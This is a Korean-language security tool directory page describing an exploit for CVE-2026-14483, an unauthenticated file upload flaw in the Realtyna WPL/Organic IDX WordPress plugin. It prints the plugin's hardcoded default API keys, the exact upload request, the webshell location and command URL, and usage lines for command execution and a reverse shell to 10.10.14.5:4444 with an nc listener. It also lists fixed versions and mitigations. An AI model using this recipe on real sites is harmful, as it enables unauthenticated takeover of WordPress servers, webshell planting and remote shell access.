Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-14483_exploit — Realtyna WPL/Organic IDX WordPress 플러그인의 인증되지 않은 임의 파일 업로드 익스플로잇으로, PHP webshell 업로드를 RCE로 연계하며 명령 실행 및 리버스 셸 모드를 지원합니다. | Kitploit
도구/GitHubGitHub/0xdak/cve-2026-14483_exploit
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed Teaming
GitHub0xdak/cve-2026-14483_exploit

CVE-2026-14483_exploit

Realtyna WPL/Organic IDX WordPress 플러그인의 인증되지 않은 임의 파일 업로드 익스플로잇으로, PHP webshell 업로드를 RCE로 연계하며 명령 실행 및 리버스 셸 모드를 지원합니다.

저장소 보기
15일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-14483 — Realtyna WPL / Organic IDX 인증되지 않은 임의 파일 업로드 → RCE

Realtyna WPL / Organic IDX WordPress 플러그인(real-estate-listing-realtyna-wpl ≤ 5.2.0)에서 RCE로 이어지는 인증되지 않은 임의 파일 업로드 취약점입니다.

이 플러그인은 공개 WordPress init 훅에 **"I/O 서비스"**를 등록하며, 사이트 루트에서 ?wplview=io&wplformat=io를 통해 인증 없이 접근할 수 있습니다. 유일한 관문은 플러그인 마이그레이션에 포함된 정적(static) 하드코딩 기본 키 한 쌍(모든 설치본에서 동일)이며, io_status는 기본적으로 활성화되어 있습니다.

root@kitploit:~
public_key  = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
private_key = Eft76bdh0o2uyhJkbG3T

set_property 명령(libraries/io/mobile_application/set_property.php → wpl_file::upload)은 업로드된 file[]을 move_uploaded_file로 저장하며 확장자/MIME 검사가 없으므로 .php 웹셸을 업로드하여 웹 사용자 권한으로 실행할 수 있습니다.

  • 영향받는 버전: real-estate-listing-realtyna-wpl ≤ 5.2.0
  • 수정 버전: 5.3.0 (취약한 인증 없는 명령이 제거됨)
  • CWE: 434 (위험한 유형의 파일 무제한 업로드)
  • 영향: 웹 사용자(www-data) 권한으로 인증 없는 RCE

요구 사항

Python 3 표준 라이브러리만 필요 — 의존성 없음.

사용법

root@kitploit:~
# run a command and print output
python3 exploit.py http://target/ -c id

# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://target/ --shell 10.10.14.5:4444

작동 방식

  1. 업로드 — POST /?wplview=io&wplformat=io&public_key=…&private_key=…&cmd=set_property&commands_directory=mobile_application&user_id=1 요청에 멀티파트 file[]을 image_<name>.php라는 이름으로 포함해 전송합니다. image_ 접두사는 제거되므로 파일은 <name>.php로 저장됩니다.
  2. 위치 확인 — 웹셸은 wp-content/uploads/WPL/<pid>/<name>.php에 저장됩니다. 여기서 <pid>는 요청으로 생성된 프로퍼티의 id입니다(응답에는 표시되지 않음). 이 도구는 작은 프로퍼티 id들을 열거하여 웹셸을 찾습니다.
  3. 실행 — …/<name>.php?c=<cmd>에 접속합니다.

대상 식별

real-estate-listing-realtyna-wpl 플러그인 ≤ 5.2.0이 활성화된 WordPress 사이트. 엔드포인트는 GET /?wplview=io&wplformat=io(플러그인의 I/O 서비스)에서 응답합니다.

해결 방법

플러그인을 ≥ 5.3.0으로 업데이트하고, 업로드 확장자/MIME을 검증하며, wp-content/uploads에서 PHP를 실행하지 말고, 플러그인의 정적 기본 I/O 키를 교체하십시오.

면책 조항

승인된 보안 테스트 및 교육 목적으로만 사용하십시오. 소유하거나 테스트할 명시적 권한이 있는 시스템에만 사용하십시오.

도구 다운로드